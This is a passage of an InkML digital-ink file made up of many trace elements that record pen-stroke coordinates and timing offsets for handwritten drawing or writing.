16,-1-12-15,14-13 0,14 26-1,-14 79-15,26-53 16,53-65 0,-12 25-1,25 54 1,67-40-1,79 26 1,-79 27 0,145-27-1,-79 27 1,-27 0 0,27 0 15,-106 40-16,-66 12-15,-13 1 0,39-13 16,212-67 0,40 27-1,40-27 1,-279 80-16,212-53 16,186-40-1,-173 53 1,-26 0-1,-13 40 1,-13-27 0,-40 1 15,-199 39-31,199-40 16,-132 14 15,-54 26-16,14 0 1,-13 0 0,39 0-1,-52 0-15,39 39 16,53 27 0,-79-39-1,-27-1 1,0 80-1,0 106 1,-13-146-16,0 40 16,-39 53-1,-27-27 1,-27 27 15,80-133-31,-14 0 0,14 14 16,-40 26-1,0-26 1,14-27 0,12 0-1,14-13-15,13 14 16,-27-14 0,1 13-1,13 0 1,-14 0-1,14 1 1,-13 12 0,-1-13 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="205142.16">7686 1879 0,'53'-40'78,"238"-40"-62,291 14-1,-185 53 1,-265 13 0,252-40-1,158-26 1,-145 27-1,80 12 1,105-39 0,-238 26-1,-239 14-15,213-14 16,92 40 0,-145-40-1,92 40 1,238 0-1,133 67 1,-543-41-16,542 80 16,-65 26-1,-159-39 1,-199-54 15,66 41 0,-132-1-15,-118-39 0,-68-27-1,-25 0 1,66 27 0,39 53-1,225 26 1,-264-93-16,105 67 15,-39-14 1,-106-52 0,-40-27-1,27 53 17,92 79-17,-26-26 16,66-27-15,-53-39 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209085.02">11073 4167 0,'0'0'0,"-13"0"16,-40-13 0,-27 13-1,14-40 1,13 14-1,-13 13 1,40 13-16,-54-14 16,-39 14-1,53 0 1,-27 0 0,-26 0-1,27 40 16,65-40-31,-39 27 16,0 25 0,53-52-16,-27 40 15,-13 26 1,27-53-16,-1 27 16,1-13-16,-1 12 15,-12 27 1,39-39-1,0 26 1,0 13 0,26 40-1,53-14 1,-26 14 0,-13-66-1,-13 0 16,-14-14-15,26 1 0,-39-14-16,27 0 15,-14 0-15,53 0 16,67 40 0,-41-26-1,14-27 1,-80 13-1,-12-13 1,39 0 0,92 0-1,93-40 1,-39-26 0,-160 40-1,-25 26-15,52-40 0,40-39 31,-67 52-31,41-79 16,39-52 0,-80 65-1,-25 27 1,-1 53-16,-13-1 16,0-38-1,0-1 1,0-27-1,0 14 1,0 13 0,-27 27-1,-12-1 1,26 27-16,-1-13 16,-65-27 15,0 1-16,-14-1 1,-13 27 0,-13 0-1,106 13-15,-40 0 16,-106 0 0,119 0-16,-26 13 15,0 13 1,40-13-16,-40-13 15,52 14 1,1-14-16,0 13 0,0-13 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="212053.92">8983 4882 0,'-14'0'31,"14"13"-15,0 26 15,0 14-15,40 40 0,-13 13-1,12-14 16,14 120-15,-53-199-16,40 80 16,-14-53-1,-12-14 1,-1-13 0,-13 1-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="213071.71">9168 5808 0,'0'13'218,"66"-13"-202,66 66 0,-39 0 15,-80-53-16,0 1 1,1-28 47,12-65-48,-26 0 1,0 39-1,0 27 1,0-14 0,-79 14 156,-133 13-157,159 0-15,-40 0 16,14 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="214163.94">10160 6112 0,'-13'0'32,"-27"13"-17,40 66 1,0 14 0,0-14-1,27 41 1,-1-81-1,0 1 1,-12 0 0,12-14-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-214449.04">10306 5887 0,'13'0'78,"13"26"-63,14 80 1,26 13 0,-26-66-1,-40-40 1,13-13 31,13 0-32,-12 0-15,52 0 16,53 27 0,13-1-1,80-12 1,-173-14 0,-12 0-1,-14 0-15,14-14 47,-14 1-31,13 0-1,1 0 1,-14-14 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-213735.08">8533 4710 0,'-13'66'31,"39"92"-15,-13-118-16,14 79 16,39 106 15,-40-146-16,-12 1 1,-14-1 0,13-52-1,-13-14-15,0 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-212864.07">7250 4471 0,'-14'14'0,"28"-28"0,-41 54 15,27-27 1,0 1-1,0 52 1,13 0 0,-13-53-16,14 40 15,12 0 1,-13 13 0,14 13 15,-27-52-31,26 52 15,-26 14 1,0-67-16,13 67 16,1-53-1,-14-14 1,13 1 0,0 12-1,0-26 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-208268.3">6231 2686 0,'-79'13'47,"26"13"-32,-40 1 1,-158 26-1,-80 26 1,-79 66 0,330-92-1,-171 40-15,-27 26 16,27-13 0,105-40-1,-12 0 16,131-66-31,-79 53 16,-52 0 0,39-40-1,13-13 1,-13 0 0,13 0-1,79 0-15,-65 13 16,-14 14-1,0-14 1,66 0 0,-12-13-1,-68 0 17,68 0-32,-68 0 15,15 0 16,-120 0-15,66 27 0,106-27-1,40 0-15,0 0 16,-14 0 0,14 0-1,0 0 1,-1-40 124,1-119-124,13-26 0,0 0-1,0 26 1,66 27 0,-39 92-16,26-39 15,26-27 1,-39 80-1,26-14 1,0-13 0,53-26-1,172-1 1,-92 14 0,-160 53-1,133-27-15,-26-13 31,13 27-15,13-1 0,-120 14-16,15 13 0,38-40 15,107 1 1,-172 26-16,185 13 16,-14 0-1,14 0 1,13 0-1,-52-14 1,-41 1 0,-105 0-16,52-14 15,1 1 1,13 13 0,-14-27-1,80 14 16,-79 12-15,-66 14-16,92-13 16,0-13-1,0-14 1,-13 0 0,-1 14-1,-65 13 1,0 13-1,-27-14 1,0 14 0,14 0-1,-1 0 1,-13 0 0,27 27 77,-27 26-77,0-40-16,1 13 16,-14 14-1,0 53 1,0 13-1,-27-1 1,27-91 0,0-1-16,-13 0 15,-40 13 1,13 14 0,-39 13 15,66-26-31,-53 12 15,13-12 1,26-14-16,-26 13 16,0 14-1,-26 13 1,53-27 0,12-26-16,-12 27 15,13-27 1,-1 0-16,14 13 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-204569.25">16219 9684 0,'-13'-13'0,"-106"-1"15,-67 14 1,-91 0-1,-120 0 1,-53-53 0,93 0-1,317 53-15,0 0 16,-13 0-16,-39 0 16,79 0-16,-14 27 31,-26 26-16,40-27-15,-13-12 0,-14 25 16,0 41 0,27-41-1,13-26 1,0 1-16,0 39 16,0 119-1,0 13 1,40 26-1,-1-91 1,14 38 0,-53-144-1,14 52-15,12 13 16,27 40 0,39-13 15,-65-66-31,52 65 15,40 1 1,-92-92-16,79 91 16,-14-12-1,-52-67 1,0-12 0,-40-1-16,26-13 15,80 0 1,-93 0-16,331 26 15,-119-12 1,-79-14 0,-67 0-1,0-40 1,-26-13 0,-40 40-16,146-212 15,26-185 16,-52 145-15,-94 173 0,-39 52-16,27-106 15,-14 27 1,0 93-16,-13-93 16,0 26-1,0 1 1,0 25-1,-39-91 1,-1 25 0,13 80-16,-52-105 15,39 39 1,-65-14 0,-14 41-1,-106 12 16,0 41-15,92 39 0,-105 0-1,93 0 1,-54 0 0,-39 53-1,53 26 1,172-66-16,-53 40 15,-14 13 1,14 0 0,13 1-1,40-15 1,0-38-16,0 12 0,-1 1 0,-25 52 16,25 93 15,14-13-16,0-27 1,0-13 0,0 0-1,0 53 1,27 66 0,52-39-1,-13-80 1,-26-66-1,-14-27 1,-12 1-16,12 25 16,67 68-1,-27-15 1,40 1 0,-93-93-1,80 1-15,145-41 31,-27-65-15,-171 78-16,119-25 16,-40 12-1,-40 14 1,-39 0 0,0-27-1,26-26 1,-53 53-16,66-199 15,-26 0 1,-26 159 0,-1 1-1,1-15 1,12-52 15,-25 93-31,-1-371 31,-53 251-15,27 27 0,-14-13-1,-25 53 1,-81-80 0,94 119-16,-67-26 15,-53-13 1,13 52-1,27-12 1,80 25-16,-54-12 16,-79-14-1,132 40 1,-39 0-16,13 0 16,39 0 15,14 0-31,-13 0 15,-14 0 1,27 0-16,0 14 16,-40 25-1,13 1 1,0 0 0,-26 26-1,26 40 1,1-1-1,12 147 1,1-94 0,13-25-1,13-107-15,0 93 32,26 27-17,-26-93 16,27 13-15,-1 13 0,0 1-1,14-1 1,13 0 0,-26-52-1,-14-1 1,13 1-1,1 12 1,-1 1 0,14 0-1,-27-14 1,0-12 0,14-1 30,-1 26-30,-13-39-16,14 14 16,26-1-1,-13 13 1,12-12 0,1 25-1,13-26 1,-26 14-1,0-27 1,-27 13-16,0-13 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-203635.33">13785 8520 0,'-40'39'16,"-79"133"0,93-119-16,-41 119 15,-25 53 1,26-53-1,26-79 1,40-80-16,0 27 16,0-27-1,0 26 1,-13-39 0,13 14-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-202104.66">13176 8877 0,'40'132'63,"-14"-53"-48,41 41 1,-28-68-1,-12-25 1,-14-14 0,-13 14-1,0-14 1,0 0 109,26 0-109,-26 27-1,27 53 1,-27-80-16,40 93 15,-40-40 1,0-53 0,-14-13 296,-12 0-296,13-13 15,-1 13-15,1 0-1,13-13 220,0-14-220,0 14-15,0-14 16,0 14 0,0 0-16,0-14 15,0 14 1,0 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9:42:18.1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13507 2236 0,'-13'0'15,"-14"13"-15,-12 0 16,-41 14-1,41-14-15,-200 27 16,-38-14 0,224-13-16,-13-13 15,-27 13-15,-158-13 16,65 0 0,14 0-1,14 0 16,-14 0-15,106 0-16,26 0 0,-92-26 16,-146 26-1,79 0 1,1 0 0,158 0-16,-13 0 0,-53 0 15,67 0-15,-133 0 16,-119 0-1,-14 26 1,67 14 0,0-13-1,66-1 1,119-26-16,-66 0 16,-79 27-1,26-1 16,26 0-15,-12 1 0,25-14-1,-26-13 1,1 0 0,105 0-1,26 0 1,1 0 31,-40 0-32,39 0 1,1-13 0,13 13-1,-40 0-15,53-13 16,-66-27-1,39 40-15,-39-66 16,-199-80 0,160 67-1,52 39 1,13 14 0,27 13-1,-1 13-15,-25-27 16,26 27-16,-14-13 0,-26-14 15,-13 1 1,53 13-16,-14 0 16,1-14-1,-1 14 1,14 0 93,0-1-93,0 1-16,13-13 0,-13-14 16,-27-66-1,40 66-15,-27-26 16,27-40-1,0 93-15,0-26 16,0-14 0,0 39-16,0 1 15,0-13-15,0-40 16,0 26 0,0 13 15,0 1-16,0-14 1,0 1 0,40 39-1,13-27 1,0 27 0,-40 0-16,0-13 0,27 0 15,-27 13-15,0 0 0,14 0 16,-1 0-16,54-27 15,39 1 1,159-1 0,-120 14-1,-105 0 1,-13 13-16,-27 0 0,27 0 0,53-13 16,-67-1-16,0 14 15,67-13 1,26 13-1,27 0 1,-67 0 0,0-26-1,-52 26-15,39 0 16,-40 0-16,14 0 0,13 0 16,-13 0-16,118 0 15,28 13 1,-133 0-16,105 14 15,14-14 1,-145 0-16,65 0 16,54-13-1,-53 0 1,-27-26 0,-40 26-1,120 0 48,-54 40-48,226 79 1,39-53 0,-264-53-16,131 0 15,-25-13 1,-146 0-16,119 0 15,-53 0 1,-27 0 0,-12-26-1,-1-1 1,1-26 0,-67 53-1,13 0-15,1-13 0,-14 13 0,66-26 31,27-1-15,0-12 0,-80 25-16,-12 1 0,52 0 15,26-14 1,-39 14-16,27-13 16,-1 26-1,-39 0 1,-1 0-1,-25 0-15,-1 0 16,40 0 15,39 0-15,147 0 0,-81 53-1,-118-40 1,53 27-1,-14-27 1,-26 13 0,-40-26-1,0 0 32,93 53-31,-79-53-16,26 27 15,-40-14 1,13-13 0,-13 13-1,-13 0-15,14 1 16,-1 12-16,27 40 16,39 27-1,-79-67-15,93 80 16,-40 0 15,-27-66-15,-26-1-1,0 14 1,0 27 0,0-14-1,0-40 1,0-13-1,0 27 64,-106 39-64,106-65 1,-13-14-16,0 13 15,-40 27 1,40-40-16,13 13 16,-14-13 15,-39 13-15,0 13-1,-26 14 1,53-40-16,-27 27 15,26-14 1,14-13 31,-66 0-31,52 13-16,-52 0 31,13 1-16,52-14 1,1 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43087.63">16417 11033 0,'0'0'0,"-92"0"0,26 0 16,52 0-16,1 0 16,66 0 109,132 0-110,-66-13-15,411-27 16,-226 1 15,-93-1-15,-78 13-1,-94 27 1,-25 0 0,-1 0-1,-13-13 110</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43925.39">15359 10835 0,'-13'13'15,"26"-26"-15,-53 39 16,27-26-16,0 0 16,-14 13-16,-52 1 15,-186 12 1,-92 1 15,304-27-31,0 0 0,-39 0 16,-80 0-1,159 0-15,-14 0 0,14 0 0,0 0 16,-27 0 0,14 0-1,-1 0 63,-13 0-62,14 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44647.82">12991 10702 0,'-13'0'62,"-14"14"-46,-52-14 0,-27 39-1,80-25-15,-54 12 16,67-26-16,-185 0 16,-27 0-1,198 0-15,1 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="45565.21">11284 10755 0,'0'0'0,"-66"27"94,27-27-79,-1 0-15,-304 0 16,172-27 0,106 14-16,-66 13 15,92-13-15,-26 0 16,13 13 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="53513.89">21193 7964 0,'0'0'0,"-40"40"63,1-14-47,-14-13-1,13 14 1,-13-27-1,14 26 1,25-26-16,-52 0 16,-26 0-1,-14 27 1,-119-14 0,93 0-1,12 0 1,68-13-1,-1 0-15,-40 0 32,80 0-32,-53 0 15,26 0 1,14 0 0,-14 0-1,27 0-15,-54 0 16,15 0-1,-28 0 1,27 0 0,27 0-1,13 0 1,-1 0 31,-65 0-16,53 0-15,-1 0-1,14 0-15,0-13 32,-27 0-17,-39-27 1,12 1-1,54 25-15,0-12 79,-27-14-64,40 27-15,-26-14 16,-14-39 15,14 40-15,26 13-1,-27-14 95,14 1-48,13 13-31,0-14-15,-13 14-16,13-14 0,-14-26 16,14 40-16,0-13 15,0-54 1,0 27 0,0-26-1,0 26 1,14 27-1,-14 12-15,0-12 16,26-14 0,-26 14-1,27-14 1,-27 27-16,0 0 31,13 13-31,-13-13 0,26-1 31,1-25-15,12 12 0,41-13-1,26 1 1,-14-1 0,1 14-1,-67 12-15,40 14 16,-26 0-1,26-13 1,40 13 0,-13 0-1,39 0 1,-92 0-16,39 0 16,-13 0-1,-26 0 1,0 0 15,-14 0-15,40 0-1,-26 0-15,26 0 16,13 0 0,-65 0-1,-1 0 16,27 0-15,-14 0-16,40 0 16,-13 0-1,0 0 1,-27 0 0,1 0-1,-14 0 1,0 0-1,1 0 1,-14 13 0,13-13 15,40 53-15,-40-39-16,13-1 15,14 26 1,-40-12-1,27-14 1,-27 0-16,13 1 16,0 25-1,-13-25-15,13 25 16,27 41 0,-40-54-1,0 14 16,26-1-31,-26 28 32,0-54-32,0 13 15,0 14 1,0 0 0,0 13-1,0-14 1,0 1-1,0-14-15,0 1 16,0-1 0,27-12-1,-27 25 17,0 1-17,0 26 1,0-26 15,0-27-15,0 0 31,0 27-32,0-27-15,0 27 16,0 13 46,0 0-46,-13-53-16,13 39 16,-14-39 62,14 14-63</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="55717.11">11099 10755 0,'93'14'140,"26"-14"-124,40 0 0,-93 0-1,-53 0-15,14 0 16,12 0 0,-12 0-1,-1 0 1,-13 0 15,1 0 94,-1 0-31,0 0-63</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="56715.17">12978 10821 0,'13'0'125,"53"0"-109,-39 0-16,65 0 15,-26 0 1,-52 0 0,-41 0 124,-118 0-124,-54 0 0,27 0-1,146 0-15,-14 14 0,-13-1 16,-26-13-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="60716.78">12052 8864 0,'13'0'62,"66"0"-46,14-14-1,13-39 1,-93 53-16,185-53 16,-52 1-1,-93 25 16,-40 27-15,0-13 15,1-27-15,-14 14-16,39-80 16,1-13-1,-40 92 1,0 1-1,0 13 17,0-53-17,-53 13 1,-26 0 0,52 26-16,-145-52 15,-26 13 1,158 52-1,0 14-15,-79-39 16,80 26-16,-67-14 16,13 27-1,14 0 1,-14 13 0,67-13-16,-67 14 15,-26-14 1,79 0-1,27 0 1,0 0 31,-80 0-31,1 0-1,12 0 16,67 13-31,-159 13 32,119-26-17,0 0 1,27 0 0,-14 0-1,-13 0 1,14 0-1,-1 13 1,40 1-16,-27-14 16,1 0-1,13 0 32,0 0-31,-93 0 15,26 39-15,41-25-1,12 12 1,-12-13 0,-1 14-1,13-14 1,1 0-1,13 0 48,-27 40-47,27-53-16,0 53 15,-14-26 1,27-1-1,-13-13 1,0 14 0,-1 39-1,14 40 1,-26-27 0,26-66-16,0 40 15,0 14 1,0 12-1,0-53 1,26 80 62,14-53-62,-27-40-1,14 14-15,52 13 32,-26-14-17,26-13 1,1-13 0,52 0-1,-92 0-15,13 0 0,92 0 16,-39 0-1,13 0 1,-66 0 0,-13 0-1,-27 0-15,13 0 16,54 0 0,-1 0-1,40-26 1,-13-14-1,-66 40 17,-27 0-32,0 0 15,14-13 1,-27 0 0,53-1-1,-40 14-15,26-13 16,41-13-1,-54 12-15,54 14 16,-27-26 0,-40 26-1,0 0 188,66 0-187,-39-13 0,-13 13-1,-14 0 1,13 0 31,27 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19:43:38.7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2130 6403 0,'26'0'141,"1"-13"-126,12-1 1,-12 1 0,-27 0-16,79 13 15,54-26 1,158 26-1,-106 0 17,-159 0-32,14-14 15,0 14 1,-27 0-16,27 0 16,13 0-1,-27 0-15,53 0 16,1 0-1,-41 0-15,28 0 16,12 0 0,-53 0-16,14 0 15,26 0 1,67 0 0,-81 0-1,41 0 1,-27 0 15,-53 0-15,67 0 359,12 0-360,-52 0 1,-27 0 0,14 0-1,65 0 1,-78 0-1,65 0-15,40 0 32,-13 0-17,-27 0 1,14 0 0,-53 0-1,-27 0-15,26 0 16,28 0-1,12 0 1,0 0 0,1 0-1,26 0 1,-67 0-16,94 0 16,-14 0-1,-27-13 1,27 0 15,-39 13-15,25-27-1,-91 27-15,39-13 16,0 13 0,-40 0-16,13 0 15,14 0 1,13 0-1,0 0 1,-40 0-16,40 0 16,40 0-1,-41 0 1,1 0 0,-26 0 15,-14 0-31,13 0 15,1 0 17,-14 0-32,27 0 15,13 0 1,-27-13 0,-13 13-1,1 0 1,12 0-1,14-13 1,0 13 0,52-14-1,1-12 1,-54 26 0,14-13-1,-13 13 1,-14 0-1,14-13 17,-13 13-17,-1 0 1,-13-14 0,14 14-1,-1 0 1,-13 0-16,14 0 15,13 0 1,-14-13 0,-13 13-1,1 0 1,-1-13 0,0 13-16,13 0 15,14 0 1,13-13-1,-40 13 17,1 0-32,-1 0 15,13-14 1,1 1 0,12 13-1,14 0 1,0 0-1,0-13 1,-26 0-16,12 13 16,27-14-1,1 1 1,12 0 0,-13 0-1,40-27 1,-80 40-16,40-13 15,27 13 17,-40-27-17,0 14 1,-27 13-16,1 0 16,13 0-1,-14 0-15,0 0 16,54-13-1,-27 0 1,-14 13 0,41-27-1,-27 27 1,-27 0-16,14 0 16,26 0-1,0 0 1,-26 0-1,-14 0 1,27 0 0,13 0-1,-39 0-15,13 0 16,52 0 0,-13 0-1,-12 0 1,12 0-1,-26 0 1,-40 0-16,27 0 16,13 0-1,0 0 1,-14 0 0,1 0-1,26 0 16,27 0 1,-54 0-17,1 0 1,0 0 0,39 0-1,-26 0 1,-13 0-16,0 0 0,132 40 15,-27 0 1,1-1 0,131 67-1,-184-93-15,476 173 16,-384-133 0,199 66-16,449 132 15,-330-172 1,-305-52-1,-158-14 1,-14-13 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1316.97">9141 11232 0,'-145'0'109,"52"13"-93,40-13-16,-132 13 15,-27-13 1,-52-40-1,12-13 1,226 40-16,-80 0 16,-66-27-1,106 40 1,13 0 0,13 0-1,1-13 1,26 0 312,13 0-328</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2166.3">11549 11152 0,'-40'0'16,"-185"13"-1,173 1-15,-120 12 16,92-13-16,-65 27 16,-67-27-1,106-13 1,14 0 0,78 0-16,-25 0 15,25 0 1,1 0-16,-13 0 47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2853.4">14420 11232 0,'0'0'0,"-80"13"15,67 0-15,-53 13 16,-79 1 0,65-14-1,-26-13 1,80 0-16,-40 0 16,-14 0-1,54 0 1,-14 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3783.75">18428 11218 0,'-39'27'16,"-54"39"-1,-13-13 1,0-13 0,80-27-16,-27-13 15,0 0 1,-119 0-16,79 0 31,54 0-31,25 13 0,-91 27 16,-1-1-1,-13-25 1,0-14 0,39 0-1,41 0 1,25 0 140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20:02:13.2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14301 4987 0,'-14'0'47,"-38"0"-31,38 0-16,-52 0 16,-26-13-1,-266-27 1,319 40-16,-80-13 15,-14 13 1,120-13-16,-13 13 0,-67-13 16,-26-14-1,-27 14 1,120 13 0,-80-26-16,-53-1 31,133 27-31,-14 0 0,-52 0 15,12-26 1,27 26 0,14 0-1,25 0 1,1-14 78,0 14-16,-27-66-63,27 53-15,0-27 32,-14 1-17,27 12-15,-26-26 16,13 14 0,0-27-1,-1 26 1,14 27-16,0-1 0,-13-12 15,0-40 1,0 26 0,-1-13-1,14 27-15,0-27 16,0 40-16,0-14 16,-13-13-16,0 14 0,13-40 15,0-27 16,0 27-15,0 40 0,0 12 46,0-12-46,13 13-16,14-1 15,12-25-15,67-27 16,-79 66-16,39-40 16,0-13-1,-40 53-15,14 0 16,39-26 0,14 26-1,158 0 16,-158 0-31,26 39 16,93 14 0,-159-26-16,13-14 0,66 27 15,186 26 1,-266-53-16,68 53 16,157 66-1,-197-105-15,52 26 16,-26-14-1,-93-25-15,0-14 0,1 0 16,12 0 0,-13 13-1,0 0 17,1-13-17,25 40 48,1-27-48,0 14 1,-27-27 15,0 26 0,-13 14-15,0-27-16,0 13 16,0 40-1,0-52 1,0 12-16,0-13 0,0 1 16,-26 25-16,-1 1 15,-12 13 16,12-27-31,-26 41 16,27-41-16,-54 53 16,-118 107-1,119-107-15,26-13 0,-27-26 16,54-14 0,13-26-16,-1 0 15,14 13 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1101.11">15954 4842 0,'14'-27'31,"-1"14"-15,13 0 31,159 13-32,-79 0-15,185 53 16,-198-40-16,277 14 16,186 12-1,-410-39-15,-14 0 0,212 0 16,-66 13-1,-212-13-15,13 0 0,27 0 16,-53 0-16,119 0 16,40-13-1,-146 13-15,-13-13 16,105-13-16,28-1 16,-41-26 15,-118 53-31,-1-13 0,53-14 15,-52 1-15,65-14 16,-78 40-16,25-13 0,27-13 16,-39 12-16,39-25 15,-26 26 1,-27 13-16,0 0 16,0-14 15,107 54-16,-94-27-15,14 0 0,92 14 16,13 13 0,-65-14-1,-40-13 1,-27-13 171</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6840.14">8744 8268 0,'-13'0'94,"-93"-26"-78,67 13-16,-80 13 15,-53-40 1,119 40-16,13 0 0,0 0 16,-52 0-16,-107 0 15,133 0 1,-119 0-16,-66-13 16,79-14-1,132 27 1,27-13-16,-14 13 0,14-13 15,0-27 126,13-66-125,0 80-1,0-14-15,0 0 0,0 14 16,0-27-16,0-26 16,0-40-1,0-53 1,0 79 15,0 80-31,0-1 0,13 1 16,40-40 31,26-26-32,-65 53-15,78-41 16,-65 41-16,-14-1 0,53-12 15,-40 39-15,41-27 16,12-12 0,-66 39-1,14 0 1,-14 0 0,27-27-16,-14 27 15,-13 0 16,14 0 1,52 0-17,-39 0-15,13 40 16,-14-27-16,41 14 16,-1 12-1,-39-26 1,13 14-1,-40-27-15,40 26 16,-13 1 0,-27-27-16,13 26 15,1-26 1,-27 14-16,0-1 16,13-13-16,0 0 0,-13 13 31,27 13-16,-14-12 1,0 12 0,0-13-1,-13 1 1,14-14 0,12 26-1,-26-13-15,26 14 16,14-1-1,-27-26-15,14 13 16,-14-13 15,14 14-15,-14-1 0,26 27-1,-12-14 1,-1 14-1,27 39 1,-53-52-16,40 39 16,-27-27-16,0 14 15,27 0 1,-40-40-16,0 1 0,13-14 16,-13 13-1,14 13 1,-14 14-1,0-14 1,0 14 0,0-27-16,0 1 15,0-1-15,0 0 0,0 14 16,0 12 0,0-12 77,0-14-77,-53 13 0,-40 27-1,-13-13 1,14-14-1,78-12-15,-25-14 16,-54 26 0,40-13-1,-13 14 17,40-27-32,-1 0 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16822.36">16166 8334 0,'-53'0'140,"-119"0"-124,-13 0 0,53 0-1,92 14 1,0-1-16,1 0 0,-67-13 16,93 0-1,-14 0-15,1 0 31,12 0-31,-12 0 47,13 0-31,-14 0-16,1 0 16,-40 0-1,52 13-15,-12-13 0,-14 0 16,27 0-16,-53 14 15,26-14 1,14 0-16,12 0 16,-12 0-1,-53 0 1,65 0 0,-12 0-16,0 0 0,12 0 15,-39 0-15,40 0 16,-40 0-1,-13 0 1,53 0-16,-27 0 16,27 0-1,0 0 1,-1 0-16,1 0 16,0 0-1,-13-14 32,-14 1-31,13 13-16,14 0 15,-27-26-15,27 26 0,-79-40 16,-27-13 0,26 13-1,-13-26 16,66 53-31,27 0 0,-13-1 0,-1 1 16,-52-40 0,66 40-16,-27-27 15,14 14 1,26 13 93,-27-53-93,27 26 0,0 27-16,0-40 0,0-40 15,0 67 1,0 12-16,0-52 0,0-13 31,0 52-31,0 1 16,0 13-16,0 0 0,13-1 15,14-12 1,-1-1 0,14 1-1,-40 13-15,13 13 0,14-14 0,-1 1 16,80-26-1,-27-1 1,-52 40-16,52-27 16,67-25-1,-107 52 1,1-14 0,-14 14-1,14 0 16,-13 0-15,26 0 0,-27 0-16,14 0 15,39 0 1,0 0 0,67 0-1,-120 0-15,27 14 16,-13-14-16,66 26 15,13-13 1,-79 0-16,13-13 16,39 40-1,-52-40 1,-14 13 0,14 1-16,13-1 31,-40-13-31,0 0 0,1 0 0,52 13 31,13-13-15,-66 13-16,14 0 15,-14-13-15,0 14 0,0-14 16,1 0 0,25 13-1,14 0 1,-26-13-1,-1 27 1,-13-27 0,14 13 15,13 53-15,-27-66-1,0 13-15,0 14 0,1-14 31,-1 0-15,-13 14 0,13-14-1,0 53 1,-13-53-16,13 27 16,-13-14-16,14-12 15,-14-1-15,0 13 16,0 1-1,0 26 1,0-27-16,0 27 16,0 0-1,0-27 1,0 1-16,0-1 16,0-12-16,0 12 31,0-13-31,0 0 0,0 27 31,0 0-15,0-27-16,0 14 15,0-14-15,0 13 16,0 14 0,0-27-1,-53 53 141,40-66-140,-14 27 0,14-27-1,13 13-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="32015.69">17066 8572 0,'39'0'94,"133"0"-78,-106 0-16,93 0 15,93 0 1,-1 0 0,-185 0-1,-26 0-15,79 0 16,-80 0-16,94-13 31,-80 13-15,39 0-1,27 0 1,-66 0 0,-40 0-1,1 0 1,-1 0-1,13 0 1,1 0 0,-14 0-16,0 0 15,14 0-15,-14 0 0,0 0 16,0 0-16,67 0 16,12 0-1,1 0 16,158 0-15,-105 0 0,-106 0-16,-1 0 0,41 0 15,92 0 1,-146 0-16,67 0 16,79 0-1,-53 0 1,66-13-1,-159 0-15,27 0 16,66-27 0,-105 40-1,12-13-15,27-1 16,-27 1 0,41-13-16,-41 13 0,-13 13 15,53-27 1,40 14 15,-92 13-31,25 0 47,14 0-16,-40 0-31,14-13 16,12-14-1,-25 27-15,25-26 16,-25 12-16,25 1 16,-12 0-1,-14 0-15,27-14 16,13-12 0,-40 39-1,13-27-15,-12 14 16,12-14-1,-13 1-15,14-14 16,-1-13 0,-26 40-16,0-13 0,0-1 15,13-65 1,-13 65-16,14-39 16,-14-13-1,0-1 1,0 67-16,0-13 0,0-1 15,0 1-15,0 12 0,0-12 0,-27 0 16,1-1 0,-1 1 77,1 26-77,13 0-16,-14-14 0,1 14 16,-120-13-1,106 0-15,-132 13 16,120 0-16,-1-13 0,-40-1 16,40 1-16,-66-13 15,-66 13 1,79-14-1,0 14 1,66 13-16,14-13 16,-27-1-16,-66-12 15,106 13-15,-67-14 16,-65-12 0,132 39-1,-27-14-15,-13 1 0,-53-27 16,80 40-1,-54-26 1,54 26-16,13-13 0,-40 0 16,-53-14-1,53 14 1,-13 0 0,39 13-16,1-14 15,-14 1 1,27 13-16,-40 0 15,-39 0 1,52 0-16,-66 0 16,80 0-16,-54 0 15,40 13 1,1-13-16,-14 27 0,-13-14 16,53 0-16,-27 1 0,13-14 15,14 0-15,-53 0 0,53 13 16,-14-13-16,1 13 0,-54 13 31,41-26-15,-14 0-1,40 14-15,-27-1 16,27-13-16,-40 13 16,13 0-1,27 1-15,-14-14 0,1 0 16,-40 0-1,0 13 1,52 0 0,1-13-16,0 0 15,-13 0-15,-27 0 16,39 0-16,-39 0 16,14 13 15,26-13-31,-1 0 0,-12 0 31,13 0-15,-14 27-1,14-27-15,0 0 0,-27 13 16,27 0-16,-14-13 16,-26 13-1,40-13-15,-26 14 16,-14 12-1,39-26-15,1 0 0,0 13 16,-53 27 0,39-27-16,1-13 15,-1 